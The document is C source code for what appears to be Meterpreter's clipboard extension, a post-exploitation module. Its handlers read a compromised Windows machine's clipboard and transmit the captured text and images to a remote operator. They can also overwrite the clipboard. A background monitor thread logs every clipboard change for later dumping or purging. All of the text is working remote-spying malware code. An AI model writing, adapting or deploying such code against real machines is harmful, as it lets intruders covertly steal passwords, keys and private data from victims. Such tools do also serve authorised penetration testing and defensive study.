{ DWORD dwResult; ClipboardCapture* pCapture = NULL; BOOL bDownload = FALSE; Packet *pResponse = packet_create_response(packet); do { dprintf("[EXTAPI CLIPBOARD] Checking to see if we loaded OK"); if (!gClipboardInitialised) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Clipboard failed to initialise, unable to get data"); } bDownload = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD); if ((dwResult = capture_clipboard(bDownload, &pCapture)) != ERROR_SUCCESS) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] failed to read clipboard data"); } dprintf("[EXTAPI CLIPBOARD] writing to socket"); dump_clipboard_capture(pResponse, pCapture, bDownload); dprintf("[EXTAPI CLIPBOARD] written to socket"); free(pCapture); dwResult = GetLastError(); } while (0); if (pResponse) { dprintf("[EXTAPI CLIPBOARD] sending response"); packet_transmit_response(dwResult, remote, pResponse); } return dwResult; } /*! * @brief Handle the request to set the data that's on the clipboard. * @details This function currently only supports the following clipboard data formats: * - CF_TEXT - raw text data. * * Over time more formats will be supported. * @param remote Pointer to the remote endpoint. * @param packet Pointer to the request packet. * @return Indication of success or failure. * @todo Add support for more data formats. */ DWORD request_clipboard_set_data(Remote *remote, Packet *packet) { DWORD dwResult; PCHAR lpClipString; HGLOBAL hClipboardData; PCHAR lpLockedData; SIZE_T cbStringBytes; do { dprintf("[EXTAPI CLIPBOARD] Checking to see if we loaded OK"); if (!gClipboardInitialised) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Clipboard failed to initialise, unable to get data"); } if ((lpClipString = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)) == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] No string data specified", ERROR_INVALID_PARAMETER); } cbStringBytes = (SIZE_T)strlen(lpClipString) + 1; // do the "use the right kind of memory once locked" clip board data dance. // Note that we don't free up the memory we've allocated with GlobalAlloc // because the windows clipboard magic does it for us. if ((hClipboardData = pGlobalAlloc(GMEM_MOVEABLE | GMEM_DDESHARE, cbStringBytes)) == NULL) { dwResult = GetLastError(); pCloseClipboard(); BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Failed to allocate clipboard memory", dwResult); } lpLockedData = (PCHAR)pGlobalLock(hClipboardData); memcpy_s(lpLockedData, cbStringBytes, lpClipString, cbStringBytes); pGlobalUnlock(hClipboardData); // Try to get a lock on the clipboard if (!pOpenClipboard(NULL)) { dwResult = GetLastError(); BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to open the clipboard", dwResult); } // Clear the clipboard data pEmptyClipboard(); if (!pSetClipboardData(CF_TEXT, hClipboardData)) { dwResult = GetLastError(); dprintf("[EXTAPI CLIPBOARD] Failed to set the clipboad data: %u", dwResult); } else { dwResult = ERROR_SUCCESS; } pCloseClipboard(); } while (0); // If something went wrong and we have clipboard data, then we need to // free it up because the clipboard can't do it for us. if (dwResult != ERROR_SUCCESS && hClipboardData != NULL) { pGlobalFree(hClipboardData); } packet_transmit_empty_response(remote, packet, dwResult); return dwResult; } /*! * @brief Function which executes the clipboard monitoring. * @param thread Pointer to the thread context. * @remark This function also handles cross-thread synchronisation with * callers that want to interact with the clipboard data. */ DWORD THREADCALL clipboard_monitor_thread_func(THREAD * thread) { DWORD dwResult; BOOL bTerminate = FALSE; HANDLE waitableHandles[3] = {0}; MSG msg; ClipboardState* pState = (ClipboardState*)thread->parameter1; do { if (pState == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Thread state is NULL", ERROR_INVALID_PARAMETER); } dwResult = create_clipboard_monitor_window(pState); if (dwResult != ERROR_SUCCESS) { break; } // signal to the caller that our thread has started dprintf("[EXTAPI CLIPBOARD] Thread started"); pState->bRunning = TRUE; event_signal(pState->hResponseEvent); waitableHandles[0] = thread->sigterm->handle; waitableHandles[1] = pState->hPauseEvent->handle; waitableHandles[2] = pState->hResumeEvent->handle; dprintf("[EXTAPI CLIPBOARD] thread wait handle : %x", waitableHandles[0]); dprintf("[EXTAPI CLIPBOARD] pause wait handle : %x", waitableHandles[1]); dprintf("[EXTAPI CLIPBOARD] resume wait handle : %x", waitableHandles[2]); while (!bTerminate) { dwResult = WaitForMultipleObjects(3, waitableHandles, FALSE, 1) - WAIT_OBJECT_0; switch (dwResult) { case 0: // stop the thread dprintf("[EXTAPI CLIPBOARD] Thread stopping"); bTerminate = TRUE; break; case 1: // pause the thread dprintf("[EXTAPI CLIPBOARD] Thread paused"); pState->bRunning = FALSE; // indicate that we've paused event_signal(pState->hResponseEvent); break; case 2: // resume the thread dprintf("[EXTAPI CLIPBOARD] Thread resumed"); pState->bRunning = TRUE; // indicate that we've resumed event_signal(pState->hResponseEvent); break; default: // timeout, so pump messages if (pState->hClipboardWindow && PeekMessageA(&msg, pState->hClipboardWindow, 0, 0, PM_REMOVE)) { dprintf("[EXTAPI CLIPBOARD] Pumping message"); TranslateMessage(&msg); DispatchMessageA(&msg); } break; } } // and we're done, switch off, and tell the caller we're done pState->bRunning = FALSE; destroy_clipboard_monitor_window(pState); event_signal(pState->hResponseEvent); dprintf("[EXTAPI CLIPBOARD] Thread stopped"); } while (0); return dwResult; } /*! * @brief Clean up all the state associated with a monitor thread. * @param pState Pointer to the state clean up. */ VOID destroy_clipboard_monitor_state(ClipboardState** ppState) { dprintf("[EXTAPI CLIPBOARD] Destroying clipboard monitor state"); if (ppState != NULL && (*ppState) != NULL) { ClipboardState* pState = *ppState; if (pState->hThread != NULL) { thread_destroy(pState->hThread); } if (pState->hPauseEvent != NULL) { event_destroy(pState->hPauseEvent); } if (pState->hResumeEvent != NULL) { event_destroy(pState->hResumeEvent); } if (pState->hResponseEvent != NULL) { event_destroy(pState->hResponseEvent); } destroy_clipboard_monitor_capture(&pState->captureList, TRUE); free(pState); *ppState = NULL; } } /*! * @brief Handle the request to start the clipboard monitor. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the \c Packet containing the request. * @returns Indication of success or failure. */ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet) { DWORD dwResult = ERROR_SUCCESS; ClipboardState* pState = NULL; char* lpClassName = NULL; do { dprintf("[EXTAPI CLIPBOARD] Checking to see if we loaded OK"); if (!gClipboardInitialised) { BREAK_ON_ERROR("[EXTAPI CLIPBOARD] Clipboard failed to initialise, unable to get data"); } if (gClipboardState != NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread already running", ERROR_ALREADY_INITIALIZED); } dprintf("[EXTAPI CLIPBOARD] Starting clipboard monitor"); pState = (ClipboardState*)malloc(sizeof(ClipboardState)); if (pState == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to allocate memory for clipboard state", ERROR_NOT_ENOUGH_MEMORY); } dprintf("[EXTAPI CLIPBOARD] pState %p", pState); memset(pState, 0, sizeof(ClipboardState)); lpClassName = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_CLIPBOARD_MON_WIN_CLASS); if (lpClassName == NULL || strlen(lpClassName) == 0) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Window class name is missing", ERROR_INVALID_PARAMETER); } strncpy_s(pState->cbWindowClass, sizeof(pState->cbWindowClass), lpClassName, sizeof(pState->cbWindowClass) - 1); dprintf("[EXTAPI CLIPBOARD] Class Name set to %s", pState->cbWindowClass); pState->bCaptureImageData = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA); pState->hPauseEvent = event_create(); pState->hResumeEvent = event_create(); pState->hResponseEvent = event_create(); pState->captureList.pClipboardCaptureLock = lock_create(); if (pState->hPauseEvent == NULL || pState->hResumeEvent == NULL || pState->hResponseEvent == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to allocate memory for clipboard events", ERROR_NOT_ENOUGH_MEMORY); } pState->hThread = thread_create((THREADFUNK)clipboard_monitor_thread_func, pState, NULL, NULL); if (pState->hThread == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to allocate memory for clipboard thread", ERROR_NOT_ENOUGH_MEMORY); } gClipboardState = pState; thread_run(pState->hThread); // 4 seconds should be long enough for the thread to indicate it's started, if not, bomb out if (!event_poll(pState->hResponseEvent, 4000)) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Thread failed to start correctly", ERROR_ABANDONED_WAIT_0); } dwResult = ERROR_SUCCESS; } while (0); if (dwResult == ERROR_ALREADY_INITIALIZED) { // if we've already been initialised, then we don't want to go // resetting gClipboardState back to NULL because that means // the existing monitor will run indefinitely! Instead we will // just simulate success here dwResult = ERROR_SUCCESS; } else if (dwResult != ERROR_SUCCESS) { destroy_clipboard_monitor_state(&pState); gClipboardState = NULL; } packet_transmit_empty_response(remote, packet, dwResult); return dwResult; } /*! * @brief Pause the monitor thread, if it's running. * @param pState Pointer to the clipboard monitor thread state. * @returns Always returns \c ERROR_SUCCESS. */ DWORD clipboard_monitor_pause(ClipboardState* pState) { if (pState->bRunning) { event_signal(pState->hPauseEvent); event_poll(pState->hResponseEvent, INFINITE); } return ERROR_SUCCESS; } /*! * @brief Resume the monitor thread. * @param pState Pointer to the clipboard monitor thread state. * @returns Always returns \c ERROR_SUCCESS. */ DWORD clipboard_monitor_resume(ClipboardState* pState) { if (!pState->bRunning) { event_signal(pState->hResumeEvent); event_poll(pState->hResponseEvent, INFINITE); } return ERROR_SUCCESS; } /*! * @brief Handle the request to pause the clipboard monitor. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the \c Packet containing the request. * @returns Indication of success or failure. */ DWORD request_clipboard_monitor_pause(Remote *remote, Packet *packet) { DWORD dwResult = ERROR_SUCCESS; do { if (gClipboardState == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE); } dprintf("[EXTAPI CLIPBOARD] Pausing clipboard monitor"); dwResult = clipboard_monitor_pause(gClipboardState); } while (0); packet_transmit_empty_response(remote, packet, dwResult); return dwResult; } /*! * @brief Handle the request to resume the clipboard monitor. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the \c Packet containing the request. * @returns Indication of success or failure. */ DWORD request_clipboard_monitor_resume(Remote *remote, Packet *packet) { DWORD dwResult = ERROR_SUCCESS; do { if (gClipboardState == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE); } dprintf("[EXTAPI CLIPBOARD] Resuming clipboard monitor"); dwResult = clipboard_monitor_resume(gClipboardState); } while (0); packet_transmit_empty_response(remote, packet, dwResult); return dwResult; } /*! * @brief Handle the request to stop the clipboard monitor. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the \c Packet containing the request. * @returns Indication of success or failure. */ DWORD request_clipboard_monitor_stop(Remote *remote, Packet *packet) { DWORD dwResult = ERROR_SUCCESS; BOOL bDump = TRUE; BOOL bIncludeImages = TRUE; Packet *pResponse = packet_create_response(packet); do { if (gClipboardState == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOTHING_TO_TERMINATE); } dprintf("[EXTAPI CLIPBOARD] Stopping clipboard monitor"); bDump = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_DUMP); bIncludeImages = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA); // now stop the show event_signal(gClipboardState->hThread->sigterm); // if they don't terminate in a reasonable period of time... if (!event_poll(gClipboardState->hResponseEvent, 10000)) { // ... FINISH HIM! dprintf("[EXTAPI CLIPBOARD] Brutally terminating the thread for not responding fast enough"); thread_kill(gClipboardState->hThread); } if (bDump) { dump_clipboard_capture_list(pResponse, &gClipboardState->captureList, bIncludeImages, TRUE); } destroy_clipboard_monitor_state(&gClipboardState); dwResult = ERROR_SUCCESS; } while (0); packet_transmit_response(dwResult, remote, pResponse); return dwResult; } /*! * @brief Handle the request to dump the contents of the clipboard monitor. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the \c Packet containing the request. * @returns Indication of success or failure. */ DWORD request_clipboard_monitor_dump(Remote *remote, Packet *packet) { DWORD dwResult = ERROR_SUCCESS; BOOL bIncludeImages = TRUE; BOOL bPurge = TRUE; Packet *pResponse = packet_create_response(packet); do { if (gClipboardState == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE); } bIncludeImages = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA); bPurge = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_CLIPBOARD_MON_PURGE); dprintf("[EXTAPI CLIPBOARD] Purging? %s", bPurge ? "TRUE" : "FALSE"); dump_clipboard_capture_list(pResponse, &gClipboardState->captureList, bIncludeImages, bPurge); if (bPurge) { lock_acquire(gClipboardState->captureList.pClipboardCaptureLock); destroy_clipboard_monitor_capture(&gClipboardState->captureList, FALSE); lock_release(gClipboardState->captureList.pClipboardCaptureLock); } dwResult = ERROR_SUCCESS; } while (0); packet_transmit_response(dwResult, remote, pResponse); return dwResult; } /*! * @brief Handle the request to purge the contents of the clipboard monitor. * @param remote Pointer to the \c Remote instance. * @param packet Pointer to the \c Packet containing the request. * @returns Indication of success or failure. */ DWORD request_clipboard_monitor_purge(Remote *remote, Packet *packet) { DWORD dwResult = ERROR_SUCCESS; BOOL bIncludeImages = TRUE; BOOL bPurge = TRUE; Packet *pResponse = packet_create_response(packet); do { if (gClipboardState == NULL) { BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Monitor thread isn't running", ERROR_NOT_CAPABLE); } lock_acquire(gClipboardState->captureList.pClipboardCaptureLock); destroy_clipboard_monitor_capture(&gClipboardState->captureList, FALSE); lock_release(gClipboardState->captureList.pClipboardCaptureLock); dwResult = ERROR_SUCCESS; } while (0); packet_transmit_response(dwResult, remote, pResponse); return dwResult; }